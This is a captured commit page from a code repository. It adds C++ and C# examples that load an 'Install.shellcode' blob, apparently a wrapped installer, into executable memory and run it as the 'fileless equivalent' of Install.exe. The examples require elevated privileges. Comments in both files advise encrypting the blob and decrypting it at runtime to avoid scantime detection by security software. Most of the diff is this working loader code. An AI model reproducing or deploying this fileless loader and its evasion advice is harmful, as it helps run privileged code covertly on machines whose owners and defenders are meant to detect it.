Skip to content

Commit 42af739

Browse files
author
bytecode77
committed
Documentation
1 parent 21ee0ac commit 42af739

File tree

3 files changed

+42
-5
lines changed

3 files changed

+42
-5
lines changed

Docs/Documentation.docx

30.8 KB
Binary file not shown.

Examples/InstallShellCode.cpp

Lines changed: 7 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -2,22 +2,24 @@
22

33
// Example on how to use Install.shellcode
44

5-
// Install.shellcode wraps up Install.exe in a way that it can be loaded and executed as shellcode
5+
// Install.shellcode wraps up Install.exe in a way that it can be loaded and executed as shellcode.
66

77
int main()
88
{
9+
// --- Elevated privileges required ---
10+
911
// 1. Load Install.shellcode from resources or from a BYTE[]
10-
// Ideally, encrypt the file and decrypt it here to avoid scantime detection
12+
// Ideally, encrypt the file and decrypt it here to avoid scantime detection.
1113
LPBYTE shellCode = ...
1214

13-
// 2. Make the shellcode RWX
15+
// 2. Make the shellcode RWX.
1416
DWORD oldProtect;
1517
VirtualProtect(shellCode, shellCodeSize, PAGE_EXECUTE_READWRITE, &oldProtect);
1618

17-
// 3. Cast the buffer to a function pointer and execute it
19+
// 3. Cast the buffer to a function pointer and execute it.
1820
((void(*)())shellCode)();
1921

20-
// This is the fileless equivalent to executing Install.exe
22+
// This is the fileless equivalent to executing Install.exe.
2123

2224
return 0;
2325
}

Examples/InstallShellCode.cs

Lines changed: 35 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,35 @@
1+
using System;
2+
using System.Runtime.InteropServices;
3+
4+
// Example on how to use Install.shellcode
5+
6+
// Install.shellcode wraps up Install.exe in a way that it can be loaded and executed as shellcode.
7+
8+
public static class Program
9+
{
10+
public static void Main()
11+
{
12+
// --- Elevated privileges required ---
13+
14+
// 1. Load Install.shellcode from resources or from a byte[]
15+
// Ideally, encrypt the file and decrypt it here to avoid scantime detection.
16+
byte[] shellCode = ...
17+
18+
// 2. Create an RWX buffer with the shellcode.
19+
IntPtr buffer = VirtualAlloc(IntPtr.Zero, (IntPtr)shellCode.Length, 0x1000, 0x40);
20+
Marshal.Copy(shellCode, 0, buffer, shellCode.Length);
21+
22+
// 3. Start the shellcode in a thread and wait until it terminated.
23+
IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _);
24+
WaitForSingleObject(thread, 0xffffffff);
25+
26+
// This is the fileless equivalent to executing Install.exe.
27+
}
28+
29+
[DllImport("kernel32.dll")]
30+
private static extern IntPtr VirtualAlloc(IntPtr address, IntPtr size, int allocationType, int protect);
31+
[DllImport("kernel32.dll")]
32+
private static extern IntPtr CreateThread(IntPtr threadAttributes, uint stackSize, IntPtr startAddress, IntPtr parameter, uint creationFlags, out uint threadId);
33+
[DllImport("kernel32.dll")]
34+
private static extern uint WaitForSingleObject(IntPtr handle, uint milliseconds);
35+
}

0 commit comments

Comments
 (0)